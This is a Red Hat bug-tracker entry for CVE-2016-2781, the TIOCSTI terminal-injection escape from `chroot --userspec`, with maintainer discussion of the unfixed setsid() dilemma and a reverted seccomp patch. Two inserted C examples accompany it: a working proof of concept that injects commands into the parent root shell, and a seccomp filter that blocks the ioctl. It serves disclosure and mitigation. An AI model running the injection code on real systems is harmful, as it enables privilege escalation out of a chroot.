Bug 1312863 - (CVE-2016-2781) coreutils: Non-privileged session can escape to the parent session in chroot

Status: NEW
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware/OS: All / Linux
Priority/Severity: medium / medium
Assigned To: Red Hat Product Security
Whiteboard: impact=moderate,public=20160228,repor...
Keywords: Security
Depends On: 1312864
Blocks: 1312867
Reported: 2016-02-29 07:10 EST by Adam Mariš
Modified: 2017-08-30 10:18 EDT
Doc Type: Bug Fix
Attachments: None
Description Adam Mariš 2016-02-29 07:10:09 EST
It was found that when executing a program via "chroot --userspec=someuser:somegroup / /path/to/test" the non-privileged session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer.

CVE assignment:

http://seclists.org/oss-sec/2016/q1/452
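The primitive described above, as an added example that is not part of the bug report: the unprivileged child started by `chroot --userspec=...` still shares the session and controlling terminal of the root shell that launched it, and the kernel's only check on TIOCSTI is "is this fd my controlling tty, or do I have CAP_SYS_ADMIN", so the child can queue bytes that the parent shell reads as typed input once the child exits. The same program also retries from a child that has called setsid(), which is the mitigation the thread later discusses: a new session has no controlling terminal, so the check fails and the ioctl is refused. The user/group `nobody:nogroup`, the binary name `tiocsti_demo` and the payload "id\n" are assumptions for the demo; on Linux 6.2 and newer the ioctl can additionally be disabled with the sysctl dev.tty.legacy_tiocsti=0, in which case it fails with EIO.

```c
/* Added example (not from the bug report): the TIOCSTI primitive behind
 * CVE-2016-2781 and the setsid() mitigation discussed in the thread.
 * Build:  cc -o tiocsti_demo tiocsti_demo.c
 * Demo (as root, from an interactive shell; names are assumptions):
 *   chroot --userspec=nobody:nogroup / /path/to/tiocsti_demo
 * When the unprivileged child exits, the parent shell reads the queued
 * bytes as if typed, so "id" runs as root, outside the chroot. */
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Queue each byte of `s` as terminal input on `fd` with TIOCSTI.
 * Returns the number of bytes queued, or -1 with errno set:
 *   ENOTTY  fd is not a terminal
 *   EPERM   the tty is not the caller's controlling terminal and the
 *           caller lacks CAP_SYS_ADMIN (the kernel's only check)
 *   EIO     Linux >= 6.2 with dev.tty.legacy_tiocsti=0
 * Under `chroot --userspec=...` none of these apply: the child inherits
 * the session and controlling tty of the root shell that started it. */
ssize_t tiocsti_inject(int fd, const char *s)
{
    ssize_t n = 0;
    for (; *s != '\0'; s++, n++)
        if (ioctl(fd, TIOCSTI, s) == -1)
            return -1;
    return n;
}

/* Retry the injection from a forked child that first calls setsid().
 * The new session has no controlling terminal, so the kernel's
 * "is fd my controlling tty" check fails and TIOCSTI is refused.
 * Returns the child's errno after the attempt (0 means the mitigation
 * did not hold and the bytes were queued). */
int tiocsti_errno_after_setsid(int fd, const char *s)
{
    int pfd[2], err = -1;
    if (pipe(pfd) == -1)
        return errno;
    pid_t pid = fork();
    if (pid == -1)
        return errno;
    if (pid == 0) {                 /* child: never a group leader, so setsid() succeeds */
        close(pfd[0]);
        err = 0;
        if (setsid() == -1)
            err = errno;
        else if (tiocsti_inject(fd, s) == -1)
            err = errno;
        if (write(pfd[1], &err, sizeof err) != sizeof err)
            _exit(1);
        _exit(0);
    }
    close(pfd[1]);
    if (read(pfd[0], &err, sizeof err) != sizeof err)
        err = -1;
    close(pfd[0]);
    waitpid(pid, NULL, 0);
    return err;
}

int main(void)
{
    const char *payload = "id\n";   /* constructed payload for the demo */

    if (!isatty(STDIN_FILENO)) {
        fprintf(stderr, "stdin is not a terminal; nothing to inject\n");
        return 1;
    }
    if (tiocsti_inject(STDIN_FILENO, payload) == -1) {
        perror("TIOCSTI");          /* EPERM or EIO: the kernel refused it */
        return 1;
    }
    printf("queued %zu bytes for the parent session\n", strlen(payload));

    int err = tiocsti_errno_after_setsid(STDIN_FILENO, payload);
    printf("same attempt after setsid(): %s\n",
           err ? strerror(err) : "queued (not blocked)");
    return 0;
}
```

Run outside a chroot as an unprivileged user on a kernel that still honours TIOCSTI, the first attempt succeeds and the second reports "Operation not permitted": that difference is exactly why the thread settles on setsid() as the only available fix, and also why it is unattractive, since a command that has lost its controlling terminal can no longer receive job-control signals or read from it.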
Comment 1 Adam Mariš 2016-02-29 07:11:07 EST
Created util-linux tracking bugs for this issue:

Affects: fedora-all [bug 1312864]
Comment 4 Ondrej Vasik 2016-04-04 08:48:39 EDT
Is that really against coreutils? Based on http://marc.info/?l=util-linux-ng&m=145694736107128&w=2 (and https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=815922 ) it seems to be an issue with runuser/su - therefore util-linux was IMHO correct.
Comment 5 Cedric Buissart 2016-04-05 11:35:33 EDT
(In reply to Ondrej Vasik from comment #4)
> Is that really against coreutils? Based on
> http://marc.info/?l=util-linux-ng&m=145694736107128&w=2 (and
> https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=815922 ) it seems to be
> an issue with runuser/su - therefore util-linux was IMHO correct.

This BZ is for the chroot jailbreak.
The similar util-linux attack has its own BZ & CVE: CVE-2016-2779
Comment 6 Cedric Buissart 2016-04-08 06:16:36 EDT
Marking Not-a-bug for RHEL5 based on the following:
RHEL5's chroot command does not have a drop-privilege feature (i.e. --userspec). chroot will run the command as root, and root is expected to be able to break out of the jail (see https://securityblog.redhat.com/2013/03/27/is-chroot-a-security-feature/ or https://en.wikipedia.org/wiki/Chroot#Limitations for additional information)
Comment 7 Kamil Dudka 2016-09-27 07:48:56 EDT
I am not aware of any fix for chroot without unintended side effects.  The situation is fairly well described in the util-linux-2.28 release notes:

    This security issue is NOT FIXED yet.  It is possible to disable the ioctl
    TIOCSTI by setsid() only.  Unfortunately, setsid() has well-defined use
    cases in su(1) and runuser(1) and any changes would introduce regressions.
    It seems we need a better way -- ideally another ioctl (or whatever is
    supported by the kernel) to disable TIOCSTI without setsid().

https://www.kernel.org/pub/linux/utils/util-linux/v2.28/v2.28-ReleaseNotes

I am afraid the above statement applies to chroot, too.
Comment 8 Cedric Buissart 2016-09-27 08:50:21 EDT
Yes it does, and to polkit as well (CVE-2016-2568).
This idea of the new ioctl was originally suggested in the thread http://www.spinics.net/lists/util-linux-ng/msg12451.html.
There has been, AFAIK, no kernel-side discussion, though.
Comment 13 Kamil Dudka 2017-08-29 11:10:34 EDT
coreutils upstream has applied a similar patch (using libseccomp) on runcon:

http://git.savannah.gnu.org/cgit/coreutils.git/commit/?id=v8.27-97-g8cb06d4
Comment 14 Kamil Dudka 2017-08-30 10:18:44 EDT
(In reply to Kamil Dudka from comment #13)
> coreutils upstream has applied a similar patch (using libseccomp) on runcon:
> 
> http://git.savannah.gnu.org/cgit/coreutils.git/commit/?id=v8.27-97-g8cb06d4

coreutils upstream has reverted the above patch:

http://git.savannah.gnu.org/cgit/coreutils.git/commit/?id=v8.27-101-gf5d7c0842
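The seccomp approach mentioned in comments 13 and 14, as an added example that is not the coreutils patch: the runcon change used libseccomp; this version uses the raw prctl(2)/BPF interface so that it builds with only the kernel headers. It installs a filter that makes ioctl(fd, TIOCSTI, ...) fail with EPERM and then execs the confined command, so the filter is inherited by everything that command runs. The wrapper name `no_tiocsti` and the `nobody:nogroup` user are assumptions; the filter deliberately stays minimal and, like any seccomp filter meant for production, would also need an architecture check and a comparison of the upper half of the 64-bit request argument.

```c
/* Added example, not coreutils' code: reject ioctl(TIOCSTI) with a
 * seccomp-bpf filter before exec'ing the confined command, which is the
 * idea behind the reverted runcon patch (that one used libseccomp; this
 * uses the raw prctl(2)/BPF interface to avoid the dependency).
 * Build:  cc -o no_tiocsti no_tiocsti.c
 * Use:    chroot --userspec=nobody:nogroup / ./no_tiocsti /bin/sh
 *         (names are assumptions for the demo) */
#define _GNU_SOURCE
#include <errno.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <stddef.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Install a filter that makes ioctl(fd, TIOCSTI, ...) fail with EPERM and
 * lets every other syscall through.  Seccomp filters are inherited across
 * fork() and execve(), so the confined command and all its descendants are
 * covered.  Returns 0 on success, -1 with errno set otherwise.
 * Minimal on purpose: no arch check, and only the low 32 bits of args[1]
 * are compared; a production filter needs both. */
int install_tiocsti_filter(void)
{
    struct sock_filter prog[] = {
        /* A = syscall number; if it is not ioctl, allow */
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_ioctl, 0, 3),
        /* A = low 32 bits of args[1] (the request); if not TIOCSTI, allow */
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, args[1])),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, TIOCSTI, 0, 1),
        /* TIOCSTI: fail the syscall with EPERM without entering the tty layer */
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | (EPERM & SECCOMP_RET_DATA)),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
    };
    struct sock_fprog fprog = {
        .len = sizeof prog / sizeof prog[0],
        .filter = prog,
    };

    /* Required for an unprivileged process to install a filter; it also
     * stops the confined command from regaining privilege via setuid binaries. */
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) == -1)
        return -1;
    return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &fprog);
}

/* Probe used by the demo: attempt TIOCSTI on `fd` and return errno
 * (0 if the byte was queued).  Before the filter the result depends on
 * the fd (ENOTTY for a pipe, EPERM/EIO/0 for a tty); after the filter it
 * is always EPERM because seccomp rejects the call first. */
int tiocsti_probe_errno(int fd)
{
    char c = '\n';
    return ioctl(fd, TIOCSTI, &c) == -1 ? errno : 0;
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s command [args...]\n", argv[0]);
        return 2;
    }
    if (install_tiocsti_filter() == -1) {
        perror("seccomp");
        return 1;
    }
    execvp(argv[1], &argv[1]);
    perror("execvp");
    return 127;
}
```

Unlike setsid(), this keeps the controlling terminal and job control intact, which is why it was attractive for runcon; the cost is a Linux-only dependency (the kernel interface here, libseccomp upstream) in a portable tool, and a filter that every descendant process carries for its lifetime.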
